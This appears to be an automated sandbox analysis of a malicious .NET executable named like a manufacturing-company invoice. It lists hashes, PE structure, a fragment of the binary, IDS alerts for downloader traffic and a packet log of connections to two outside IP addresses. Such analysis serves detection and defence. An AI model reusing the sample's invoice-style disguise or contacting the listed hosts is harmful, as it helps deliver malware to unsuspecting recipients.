                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m.f..................... ........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......(...hw......J....................................................0..A....... .........%.h...(.....i... .........%....(.........(....*.....&*......j}.....s....}......}....+..(.......(.....*....0..........~i.....~.......$....E4.......k....... ...........3...................0.......................0...;...............N.......f...........U...T...T.......................9...........h...........J...*...x...s...o...#.......{..................j}.....{....o........,....&. S..
                                        Process:C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.917312194082446
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        File size:792'576 bytes
                                        MD5:b2fcde172f7605e8a4af7b60349418d7
                                        SHA1:7279c465e2ea6ced62c742c679db21ec9a9a4514
                                        SHA256:8fcc14a7d1f657fd1cf84282ad1d81404e7ccc253e9ad8f36ccd9118a674d6cc
                                        SHA512:8b40661958d8d0fcd170b3d61492a8fc3fbbaefadeb2296d42500cf24935cce6e44575293e2210decff4ccd5212821270dc3dfe788f4c8bdebf36fadbce0a0e5
                                        SSDEEP:24576:YbioMtmDUIKVQ2UNdpZRRMDdK/1Apztv:YMt+F2Q/jCMoztv
                                        TLSH:70F42309B9B6BF63DFFD93B0211210180379A866A351F7E32FC1E0E79D26B805A45E57
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m.f..................... ........... ........@.. .......................`............@................................
                                        Icon Hash:ecf092ceccd0c4c4
                                        Entrypoint:0x4c14de
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66CE6D1E [Wed Aug 28 00:19:42 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc14900x4b.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc20000x1e00.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc40000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xbf4e40xbf600aab3334edf5b631dddcb60508528c609False0.9422431213259308data7.924386208696683IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xc20000x1e000x1e005881f4bd6215b6567cd361877343c2acFalse0.8223958333333333data7.255452302223029IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xc40000xc0x200d7887a811bc28b9ce92a9500b62a9fd9False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xc21000x17f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9074466351637608
                                        RT_GROUP_ICON0xc390c0x14data1.05
                                        RT_VERSION0xc39300x2b2data0.4492753623188406
                                        RT_MANIFEST0xc3bf40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                        DLLImport
                                        mscoree.dll_CorExeMain
                                        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                        2024-08-29T12:16:25.120780+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24971180192.168.2.10193.122.6.168
                                        2024-08-29T12:16:22.828528+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24971180192.168.2.10193.122.6.168
                                        2024-08-29T12:16:28.698912+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24972380192.168.2.10193.122.6.168
                                        2024-08-29T12:16:18.292635+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24970680192.168.2.10193.122.6.168
                                        2024-08-29T12:16:27.215975+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349721443192.168.2.10188.114.97.3
                                        2024-08-29T12:16:24.148322+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349715443192.168.2.10188.114.97.3
                                        2024-08-29T12:16:29.337371+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349725443192.168.2.10188.114.97.3
                                        2024-08-29T12:16:29.465790+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349726443192.168.2.10188.114.97.3
                                        2024-08-29T12:16:24.261401+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24971180192.168.2.10193.122.6.168
                                        2024-08-29T12:16:25.685896+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349718443192.168.2.10188.114.97.3
                                        2024-08-29T12:16:21.455030+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24971280192.168.2.10193.122.6.168
                                        2024-08-29T12:16:18.741649+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349710443192.168.2.10188.114.97.3
                                        2024-08-29T12:16:26.386413+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24971980192.168.2.10193.122.6.168
                                        2024-08-29T12:16:16.777161+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24970680192.168.2.10193.122.6.168
                                        2024-08-29T12:16:30.721477+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349730443192.168.2.10188.114.97.3
                                        2024-08-29T12:16:27.195934+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349720443192.168.2.10188.114.97.3
                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 29, 2024 12:16:15.266568899 CEST4970680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:15.271866083 CEST8049706193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:15.271975994 CEST4970680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:15.272239923 CEST4970680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:15.279627085 CEST8049706193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:16.159588099 CEST8049706193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:16.165649891 CEST4970680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:16.170646906 CEST8049706193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:16.679012060 CEST8049706193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:16.758641005 CEST49707443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:16.758678913 CEST44349707188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:16.758972883 CEST49707443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:16.768644094 CEST49707443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:16.768662930 CEST44349707188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:16.777160883 CEST4970680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:17.235970020 CEST44349707188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:17.236078978 CEST49707443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:17.254838943 CEST49707443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:17.254854918 CEST44349707188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:17.255202055 CEST44349707188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:17.349518061 CEST49707443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:17.396496058 CEST44349707188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:17.456310987 CEST44349707188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:17.456399918 CEST44349707188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:17.456451893 CEST49707443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:17.464349031 CEST49707443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:17.495058060 CEST4970680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:17.500022888 CEST8049706193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:18.118598938 CEST8049706193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:18.130043983 CEST49710443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:18.130079985 CEST44349710188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:18.130179882 CEST49710443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:18.130722046 CEST49710443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:18.130733967 CEST44349710188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:18.292634964 CEST4970680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:18.555201054 CEST4971180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:18.560113907 CEST8049711193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:18.560194969 CEST4971180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:18.560513020 CEST4971180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:18.565953016 CEST8049711193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:18.597356081 CEST44349710188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:18.599551916 CEST49710443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:18.599565983 CEST44349710188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:18.741673946 CEST44349710188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:18.741770029 CEST44349710188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:18.741986990 CEST49710443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:18.742607117 CEST49710443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:18.746148109 CEST4970680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:18.747258902 CEST4971280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:18.751138926 CEST8049706193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:18.751488924 CEST4970680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:18.752116919 CEST8049712193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:18.752202988 CEST4971280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:18.752340078 CEST4971280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:18.757114887 CEST8049712193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:20.466684103 CEST8049711193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:20.489833117 CEST4971180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:20.494718075 CEST8049711193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:21.342185974 CEST8049712193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:21.343621969 CEST49713443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:21.343662024 CEST44349713188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:21.343763113 CEST49713443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:21.344095945 CEST49713443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:21.344109058 CEST44349713188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:21.455029964 CEST4971280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:21.809735060 CEST44349713188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:21.812369108 CEST49713443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:21.812397003 CEST44349713188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:21.959438086 CEST44349713188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:21.959541082 CEST44349713188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:21.959649086 CEST49713443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:21.963124037 CEST49713443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:21.969472885 CEST4971480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:21.974334955 CEST8049714193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:21.974489927 CEST4971480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:21.974529982 CEST4971480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:21.982808113 CEST8049714193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:22.815336943 CEST8049711193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:22.828527927 CEST4971180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:22.833477974 CEST8049711193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:23.376174927 CEST8049714193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:23.417648077 CEST4971480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:23.436614037 CEST49715443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:23.436657906 CEST44349715188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:23.438656092 CEST49715443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:23.552270889 CEST49715443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:23.552297115 CEST44349715188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.010478973 CEST44349715188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.012644053 CEST49715443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.012664080 CEST44349715188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.148344994 CEST44349715188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.148442030 CEST44349715188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.148499966 CEST49715443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.149086952 CEST49715443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.153162003 CEST4971480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:24.154289007 CEST4971680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:24.158425093 CEST8049714193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:24.158484936 CEST4971480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:24.159303904 CEST8049716193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:24.159405947 CEST4971680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:24.159569025 CEST4971680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:24.164336920 CEST8049716193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:24.217804909 CEST8049711193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:24.259375095 CEST49717443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.259417057 CEST44349717188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.259481907 CEST49717443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.261400938 CEST4971180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:24.265070915 CEST49717443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.265084028 CEST44349717188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.724915028 CEST44349717188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.724994898 CEST49717443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.726521969 CEST49717443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.726532936 CEST44349717188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.726809978 CEST44349717188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.777026892 CEST49717443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.782318115 CEST49717443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.828497887 CEST44349717188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.887693882 CEST44349717188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.887792110 CEST44349717188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:24.887840986 CEST49717443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.888520956 CEST49717443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:24.891705990 CEST4971180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:24.897030115 CEST8049711193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:25.077893972 CEST8049711193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:25.080112934 CEST49718443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:25.080151081 CEST44349718188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:25.080209017 CEST49718443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:25.080641985 CEST49718443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:25.080653906 CEST44349718188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:25.120779991 CEST4971180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:25.537262917 CEST44349718188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:25.540415049 CEST49718443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:25.540440083 CEST44349718188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:25.685915947 CEST44349718188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:25.686007977 CEST44349718188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:25.686144114 CEST49718443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:25.686737061 CEST49718443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:25.689713955 CEST4971180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:25.690690994 CEST4971980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:25.695171118 CEST8049711193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:25.695518970 CEST8049719193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:25.695686102 CEST4971180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:25.695725918 CEST4971980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:25.695883989 CEST4971980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:25.700612068 CEST8049719193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:26.261574984 CEST8049716193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:26.308290958 CEST4971680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:26.330928087 CEST49720443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:26.330956936 CEST44349720188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:26.331079960 CEST49720443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:26.331762075 CEST49720443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:26.331774950 CEST44349720188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:26.333369970 CEST8049719193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:26.386413097 CEST4971980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:26.424509048 CEST49721443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:26.424549103 CEST44349721188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:26.424621105 CEST49721443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:26.446896076 CEST49721443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:26.446908951 CEST44349721188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:26.854438066 CEST44349720188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:26.856167078 CEST49720443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:26.856200933 CEST44349720188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:27.074538946 CEST44349721188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:27.076198101 CEST49721443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:27.076232910 CEST44349721188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:27.195957899 CEST44349720188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:27.196058035 CEST44349720188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:27.196125031 CEST49720443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:27.196665049 CEST49720443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:27.200530052 CEST4971680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:27.201654911 CEST4972280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:27.205585003 CEST8049716193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:27.205688000 CEST4971680192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:27.206451893 CEST8049722193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:27.206540108 CEST4972280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:27.206661940 CEST4972280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:27.211463928 CEST8049722193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:27.216020107 CEST44349721188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:27.216129065 CEST44349721188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:27.216178894 CEST49721443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:27.216613054 CEST49721443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:27.219741106 CEST4971980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:27.220954895 CEST4972380192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:27.225794077 CEST8049723193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:27.225886106 CEST4972380192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:27.225965023 CEST8049719193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:27.225986958 CEST4972380192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:27.226020098 CEST4971980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:27.231025934 CEST8049723193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:28.651659012 CEST8049723193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:28.653426886 CEST49725443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:28.653470993 CEST44349725188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:28.653546095 CEST49725443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:28.653786898 CEST49725443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:28.653796911 CEST44349725188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:28.698911905 CEST4972380192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:28.813514948 CEST8049722193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:28.827050924 CEST49726443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:28.827092886 CEST44349726188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:28.827166080 CEST49726443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:28.827419043 CEST49726443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:28.827430964 CEST44349726188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:28.860275984 CEST4972280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:29.109093904 CEST44349725188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:29.154875994 CEST49725443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:29.227298975 CEST49725443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:29.227324009 CEST44349725188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:29.314843893 CEST44349726188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:29.318479061 CEST49726443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:29.318506002 CEST44349726188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:29.337409973 CEST44349725188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:29.337523937 CEST44349725188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:29.337593079 CEST49725443192.168.2.10188.114.97.3
